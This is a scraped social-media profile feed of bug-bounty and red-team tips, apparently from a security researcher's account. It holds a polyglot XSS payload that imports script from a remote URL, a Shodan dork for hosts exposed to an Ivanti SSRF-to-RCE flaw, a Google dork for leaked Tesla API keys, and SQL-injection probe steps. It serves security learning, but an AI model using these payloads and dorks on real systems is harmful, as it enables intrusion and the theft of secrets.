Dpakmrya Profile Banner
Deepak Mourya Profile
Deepak Mourya

@Dpakmrya

Followers
33
Following
277
Media
6
Statuses
229

security researcher

127.0.0.1
Joined June 2021
Don't wanna be here? Send us removal request.
@clintgibler
Clint Gibler
11 months
🛠️ LOLESXi: Living Off The Land ESXi A comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilized in their operations By @blueteam0ps_ and @wietze https://t.co/LAYtTQMO2i
Tweet media one
2
170
627
@coffinxp7
Coffin
1 year
ONE OF MY BEST XSS ONELINER SUCCESSER MUST TRY :) #bugbountytips
Tweet media one
7
56
245
@TodayCyberNews
Today Cyber News
2 years
💀 SSRF leading to RCE in Ivanti Connect Secure. (CVE-2024-21893) Dork for Shodan: http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo" #web #cve #ssrf #rce #dork #bug
Tweet media one
Tweet media two
3
50
228
@KN0X55
KNOXSS
2 years
Use this #XSS payload to pop alert boxes EVERYWHERE! 😎 🏆 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\ https://t.co/GFfWFhdpK2))}//\76-->
9
89
351
@wtf_brut
Brut 🇮🇳
2 years
🌟SQLi_Sleeps🌟 👉It is a simple script that allow to find SQLi vulnerabilities, obtaining the response time greater than 20 seconds per medium and time-based injection. 📥 https://t.co/OcmjLUDPU9 📥 https://t.co/Pz9cWGL18l #bugbountytip #bugbountytips #ethicalhacking #sqli
Tweet media one
2
56
226
Recon Tool: go-dork🔥🔥☄️☄️ #Day5 Go-dork by dwisiswant0 is a powerful and efficient command-line tool written in the Go programming language. It is designed to be the fastest dork scanner available, streamlining the process of conducting advanced Google dork queries. The
5
112
452
@Dpakmrya
Deepak Mourya
2 years
One good way to initial access is by using msi Shenanigans , it’s getting popular nowadays by hackers to get initial access, i have written a blog, explaining how can we exploit msi shenanigans. https://t.co/jpgQ4NSFBC #redteaming #malware #initialaccess
Tweet card summary image
dpakmrya.medium.com
First of all I would like to tell that Some EDRs still don’t seem to support MOTW which could be used to prevent MSI’s execution, as…
0
0
3
@VirtualAllocEx
Daniel
2 years
I was interested to learn more about Vectored Exception Handling and how it can be used in malware development. Hence my first blog post of the year entitled "Syscalls via Vectored Exception Handling". https://t.co/VGE7ZQnwGz #redteam
Tweet card summary image
redops.at
2
96
289
@haksecio
haksec.io
2 years
Google Dork to check for Pastebin leaks! 🤓 site:pastebin[.]com ".tesla[.]com" api
0
29
141
@thebinarybot
Nithin 🦹‍♂️
2 years
Here's 2 tools you can use to effectively find sensitive information in JS files: 1️⃣ Hakrawler - Extracting JavaScript files. 🔗Link : https://t.co/FebhrUA0c6 2️⃣ LinkFinder - Finding Endpoints in JS files. 🔗Link : https://t.co/PM2uVuhQUC Do you use anything else? Let us know
Tweet card summary image
github.com
A python script that finds endpoints in JavaScript files - GerbenJavado/LinkFinder
2
36
144
File Upload Cheatsheet Where to find In upload file feature, for example upload photo profile feature How to exploit read also this pdf it conayin a many of ideas 1- https://t.co/GiCuJ2vdS3 by 0xAwali 2- https://t.co/L9H3PGU7AO by ebrahim hegazy
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
63
248
@wtf_brut
Brut 🇮🇳
2 years
🌟Subdominator🌟 is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. 📥 https://t.co/kR0s4gCt9O #bugbountytip #bugbountytips #ethicalhacking #CyberSecurity #Pentesting #sqli #xss #CyberSecurityAwareness #bugbounty #GitHub #offsec
Tweet media one
1
51
170
@cyb_detective
Cyber Detective💙💛
2 years
Free online tools to identify a city from an uploaded photo using AI: https://t.co/Wad0fr1ZSs https://t.co/dBCTblzmc8 #osint #geoint
Tweet media one
9
135
366
@tbbhunter
The Bug Bounty Hunter
2 years
GitHub - ImAyrix/fallparams: Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist https://t.co/0edOUEr7oM
Tweet card summary image
github.com
Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist - GitHub - ImAyrix/fallparams: Find All Parameters - Tool to crawl pages, find ...
1
34
132
@RootMoksha
RootMoksha Labs
2 years
Tweet media one
2
29
87
@rcx86
Mr. Rc
2 years
If your plan is to learn reverse engineering this year check out the resources I collected while learning RE: https://github[dot]com/HACKE-RC/awesome-reversing
Tweet media one
12
318
1K
@win3zz
Bipin Jitiya
2 years
CVE-2023-51467: Apache OfBiz Auth Bypass and RCE Severity: critical (CVSS 9.8) Root cause: https://t.co/7XkosqCFKy Mitigation: Upgrade Apache OFBiz Ref: https://t.co/oUWnDXn08a
Tweet media one
1
83
289
@mOhamedd7w
Mohamed Ibrahim
2 years
SQLi.. 1. original parameter --> content-length:9230 2. inject: and 1=1 # --> content-length:9230 3. inject: and 1=2 # --> content-length:4766 4. Now, sqlmap turn --> Dump the whole databases #bugbountytip #bugbounty #Pentesting
Tweet media one
Tweet media two
Tweet media three
Tweet media four
3
50
204